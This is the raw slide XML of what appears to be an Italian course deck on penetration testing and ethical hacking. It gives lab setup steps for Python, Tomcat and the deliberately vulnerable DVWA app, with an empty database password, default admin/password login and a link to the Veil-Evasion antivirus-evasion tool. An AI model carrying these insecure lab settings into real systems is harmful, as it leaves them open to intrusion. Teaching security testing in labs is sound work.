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7" r:id="rId3"/>
    <p:sldId id="267" r:id="rId4"/>
    <p:sldId id="270" r:id="rId5"/>
    <p:sldId id="269" r:id="rId6"/>
    <p:sldId id="271" r:id="rId7"/>
    <p:sldId id="272" r:id="rId8"/>
    <p:sldId id="273" r:id="rId9"/>
    <p:sldId id="274" r:id="rId10"/>
    <p:sldId id="288" r:id="rId11"/>
    <p:sldId id="276" r:id="rId12"/>
    <p:sldId id="261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6" r:id="rId21"/>
    <p:sldId id="287" r:id="rId22"/>
    <p:sldId id="284" r:id="rId23"/>
    <p:sldId id="285" r:id="rId24"/>
    <p:sldId id="263" r:id="rId25"/>
    <p:sldId id="266" r:id="rId26"/>
    <p:sldId id="289" r:id="rId27"/>
    <p:sldId id="290" r:id="rId28"/>
    <p:sldId id="291" r:id="rId29"/>
    <p:sldId id="293" r:id="rId30"/>
    <p:sldId id="297" r:id="rId31"/>
    <p:sldId id="300" r:id="rId32"/>
    <p:sldId id="305" r:id="rId33"/>
    <p:sldId id="306" r:id="rId34"/>
    <p:sldId id="302" r:id="rId35"/>
    <p:sldId id="307" r:id="rId36"/>
    <p:sldId id="318" r:id="rId37"/>
    <p:sldId id="321" r:id="rId38"/>
    <p:sldId id="319" r:id="rId39"/>
    <p:sldId id="320" r:id="rId40"/>
    <p:sldId id="304" r:id="rId41"/>
    <p:sldId id="298" r:id="rId42"/>
    <p:sldId id="301" r:id="rId43"/>
    <p:sldId id="303" r:id="rId44"/>
    <p:sldId id="308" r:id="rId45"/>
    <p:sldId id="322" r:id="rId46"/>
    <p:sldId id="310" r:id="rId47"/>
    <p:sldId id="312" r:id="rId48"/>
    <p:sldId id="311" r:id="rId49"/>
    <p:sldId id="314" r:id="rId50"/>
    <p:sldId id="316" r:id="rId51"/>
    <p:sldId id="317" r:id="rId52"/>
    <p:sldId id="309" r:id="rId5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274" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="69" d="100"/>
          <a:sy n="69" d="100"/>
        </p:scale>
        <p:origin x="-220" y="-9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pPr/>
              <a:t>7/23/2019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pPr/>
              <a:t>‹N›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pPr/>
              <a:t>7/23/2019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pPr/>
              <a:t>‹N›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=""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pPr/>
              <a:t>7/23/2019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pPr/>
              <a:t>‹N›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pPr/>
              <a:t>7/23/2019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pPr/>
              <a:t>‹N›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pPr/>
              <a:t>7/23/2019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pPr/>
              <a:t>‹N›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pPr/>
              <a:t>7/23/2019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pPr/>
              <a:t>‹N›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pPr/>
              <a:t>7/23/2019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pPr/>
              <a:t>‹N›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pPr/>
              <a:t>7/23/2019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pPr/>
              <a:t>‹N›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pPr/>
              <a:t>7/23/2019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pPr/>
              <a:t>‹N›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pPr/>
              <a:t>7/23/2019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pPr/>
              <a:t>‹N›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pPr/>
              <a:t>7/23/2019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pPr/>
              <a:t>‹N›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pPr/>
              <a:t>7/23/2019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pPr/>
              <a:t>‹N›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/>
              <a:pPr/>
              <a:t>7/23/2019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/>
              <a:pPr/>
              <a:t>‹N›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python.it/download/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vwa.co.uk/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ak2lQvBRAo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5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43.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide7.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide4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ourceforge.net/projects/bwapp/files/latest/download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bWAPP/login.php" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost/bWAPP/install.php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tudentiunisait-my.sharepoint.com/:f:/g/personal/f_garofalo8_studenti_unisa_it/EskyknYEVhlLkZkzL2EAwYwB4fOnh2HibED5Q_jNOaiQDw?e=dMaFml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localhost:9999/usu/" TargetMode="Externa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ftp/python/2.7.16/python-2.7.16.msi" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.microsoft.com/it-it/windows/downloads/virtual-machine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ourceforge.net/projects/py2exe/files/py2exe/0.6.9/py2exe-0.6.9.win32-py2.7.exe/download?source=post_page---------------------------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10.0.2.15/bWAPP/phpinfo.php" TargetMode="Externa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javadl.oracle.com/webapps/download/AutoDL?BundleId=238729_478a62b7d4e34b78b671c754eaaf38ab" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.offensive-security.com/kali-linux-vm-vmware-virtualbox-image-download/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.oracle.com/technetwork/java/javase/downloads/index.html" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sourceforge.net/projects/bwapp/files/latest/download" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.microsoft.com/en-us/microsoft-edge/tools/vms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Veil-Framework/Veil-Evasion" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.dvwa.co.uk/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.winrar.it/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.python.it/download/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.microsoft.com/it-it/windows/downloads/virtual-machines" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.apachefriends.org/it/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dl.oracle.com/webapps/download/AutoDL?BundleId=238729_478a62b7d4e34b78b671c754eaaf38ab" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.oracle.com/technetwork/java/javase/downloads/index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Penetration Testing and Ethical Hacking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Francesco </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Garofalo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>			</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Professore: Arcangelo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Castiglione</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns=""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457200"/>
            <a:ext cx="9143998" cy="1020762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Scaricare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Installare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Python 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1674812" y="1828800"/>
            <a:ext cx="723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it-IT" dirty="0" smtClean="0"/>
              <a:t>Dal sito ufficiale </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.python.it/download/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>, scaricare ed installare </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> 3.7.3 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Immagine 4" descr="Schermata del 2019-07-08 19-12-3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5012" y="2743200"/>
            <a:ext cx="6078071" cy="37831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457200"/>
            <a:ext cx="9143998" cy="1020762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Configurare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Tomcat </a:t>
            </a:r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1674812" y="2057400"/>
            <a:ext cx="9448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 smtClean="0"/>
              <a:t>Apri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cartella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configurazione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Tomcat </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Esempio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Path: "C:\xampp\tomcat\conf" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Apri il file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> server.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nella</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cartella</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> .  </a:t>
            </a:r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alla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>riga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> “70"  e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>modifica</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> la "port" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>numero</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> "8080“ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> “9999”, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>salva</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>chiudi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Apri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file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>context.xml </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>nella</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>cartella</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"conf" , </a:t>
            </a:r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alla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>riga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> "19" e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sostituisci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> &lt;Context&gt; con  &lt;Context reloadable="true"&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>salva</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>chiudi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Se hai aperto </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Xampp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> chiudilo e riavvialo,  clicca su “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>”  in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Xampp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> e vai in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"Service and Port Settings“, "Tomcat" e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>inserisci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> “9999" come "HTTP Port“ e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>salva</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Avvia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Tomcat e, per </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>testarne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funzionamento</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>,  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>digita</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> “localhost:9999”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900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Download e installazione DVWA</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rettangolo 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2208212" y="2971800"/>
            <a:ext cx="5450082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 smtClean="0"/>
              <a:t>Scarica</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> DVWA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sito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http://www.dvwa.co.uk/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Decomprimere il file zip</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Copiare la cartella nel percorso \xampp\htdocs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Avviare XAMPP ed avviare i server Apache e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Dal browser digitare “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>localhost\dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>”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4" name="Rettangolo 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1674813" y="1828800"/>
            <a:ext cx="9067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it-IT" dirty="0" smtClean="0"/>
              <a:t>DVWA (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Damn Vulnerable Web Application)  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>è</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> un'applicazione web PHP / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> vulnerabile. Offre strumenti di sviluppo Web e sicurezza per aiutare gli utenti a testare le proprie competenze  di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>penetration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> tester in un ambiente di ambiente legale.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp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Configurare DVWA</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rettangolo 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1598612" y="1752600"/>
            <a:ext cx="957345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it-IT" dirty="0" smtClean="0"/>
              <a:t>5. 	Aprire nella cartella di DVWA, la cartella “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>” ES. C:\xampp\htdocs\dvwa\config</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900"/>
            <a:endParaRPr lang="it-IT" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod" startAt="6"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Rinominare il file “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>config.inc.php.dist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>” in “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>config.inc.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>” </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900"/>
            <a:endParaRPr lang="it-IT" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod" startAt="7"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Riaprire la pagina “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>localhost\dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>”, sarai reindirizzato in una pagina di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>setup</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod" startAt="7"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod" startAt="7"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Aprire il file “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>config.inc.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>”, rinominato precedentemente, e modificare  con un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>editor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> di testo </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>	il campo “ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>db_password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>” da ‘P@ssw0rd’ a ‘’ (nessuna password), salvare e chiudere.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900"/>
            <a:endParaRPr lang="it-IT" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod" startAt="9"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Dalla pagina “localhost\dvwa\setup” e cliccare su “Create/Reset Database”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod" startAt="9"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod" startAt="9"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>A questo punto è possibile effettuare il login con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t> Password:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>password</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod" startAt="9"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod" startAt="9"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Per verificare che tutto sia attivo, dalla pagina web, clicca su </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1" smtClean="0"/>
              <a:t>Setup</a:t>
